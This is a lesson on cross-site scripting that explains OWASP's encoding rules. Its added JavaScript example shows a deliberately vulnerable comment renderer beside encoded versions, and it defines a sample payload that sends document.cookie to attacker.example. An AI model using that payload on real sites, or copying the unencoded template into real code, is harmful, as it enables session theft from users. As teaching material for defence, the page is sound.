Cross-Site Scripting
JavaScript is another vector that can be used to attack a web application. Cross-site scripting (XSS) is the JavaScript version of an injection attack: an attacker gets a malicious script into a page served by a trusted website, typically through a feature that accepts user input and echoes it back into the page without encoding it. Because the script runs in the victim's browser with the origin of the trusted site, it can read that site's cookies and DOM, issue requests as the logged-in user, and rewrite what the user sees. The video below shows some examples of XSS attacks and some simple prevention measures.
The Open Web Application Security Project (OWASP) publishes a list of XSS prevention rules, each tied to the context into which untrusted data is inserted (HTML element content, HTML attribute values, JavaScript, CSS, URL parameters). Not every rule will apply to your web application, but you need to protect your web app against every form of XSS it is vulnerable to, and the encoding that is safe in one context is not safe in another. The linked cheat sheet gives more specific guidance on implementing each rule.
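The following is an added example, not code from the lesson or from OWASP: a tiny comment renderer shown first in its vulnerable form (untrusted input concatenated straight into HTML) and then hardened with context-specific encoders that follow OWASP rule #1 (HTML element content) and rule #2 (HTML attribute values). The function names, the `data-author` attribute and the attacker's input string are all constructed for this illustration.

```javascript
// Added example (not from the lesson page). Demonstrates stored/reflected XSS
// in a server-side or client-side HTML template and the context-aware
// output encoding that OWASP's prevention rules #1 and #2 call for.

// Constructed attacker input: a "display name" that carries a script tag.
// Real payloads vary, but the shape is the same: markup where text was expected.
const ATTACKER_NAME =
  '<script>new Image().src="https://attacker.example/?c="+document.cookie</script>';

// VULNERABLE: untrusted data is interpolated directly into HTML.
// Whatever the attacker typed as a name becomes live markup in every
// visitor's browser, running in the trusted site's origin.
function renderCommentVulnerable(name, text) {
  return `<div class="comment" data-author="${name}"><b>${name}</b> says: ${text}</div>`;
}

// OWASP Rule #1: before inserting untrusted data into HTML element content,
// entity-encode the six characters that can change the parse: & < > " ' /
function escapeHtml(s) {
  const map = {
    '&': '&amp;', '<': '&lt;', '>': '&gt;',
    '"': '&quot;', "'": '&#x27;', '/': '&#x2F;',
  };
  return String(s).replace(/[&<>"'\/]/g, (ch) => map[ch]);
}

// OWASP Rule #2: inside an HTML attribute value, encode every character with
// a code point below 256 that is not alphanumeric as &#xHH;. This is stricter
// than rule #1 because an unquoted attribute can be broken out of with a
// space, and browsers tolerate many quoting styles. The attribute must also
// always be wrapped in quotes at the call site.
function escapeHtmlAttr(s) {
  return String(s).replace(/[^A-Za-z0-9\u0100-\uFFFF]/g, (ch) => {
    const hex = ch.charCodeAt(0).toString(16).toUpperCase().padStart(2, '0');
    return `&#x${hex};`;
  });
}

// HARDENED: the same template, with each interpolation encoded for the
// context it lands in. The name goes into an attribute (rule #2) and into
// element content (rule #1); the comment body goes into element content.
function renderCommentSafe(name, text) {
  return `<div class="comment" data-author="${escapeHtmlAttr(name)}">` +
         `<b>${escapeHtml(name)}</b> says: ${escapeHtml(text)}</div>`;
}

// Quick self-check a reviewer can run: does the rendered HTML still contain
// an executable script tag after the renderer has processed attacker input?
function containsScriptTag(html) {
  return /<script[\s>]/i.test(html);
}

// Stand-alone demo.
if (typeof require !== 'undefined' && require.main === module) {
  console.log(renderCommentVulnerable(ATTACKER_NAME, 'hello'));
  console.log(renderCommentSafe(ATTACKER_NAME, 'hello'));
}
```

In a browser, the better fix is to avoid building HTML strings at all: create elements and assign untrusted data through `textContent` and `setAttribute`, which never parse it as markup. The encoders above are for the cases where a template must emit a string, and they only cover the HTML body and attribute contexts; data placed inside inline JavaScript, CSS or a URL needs the encoding from OWASP's corresponding rule instead.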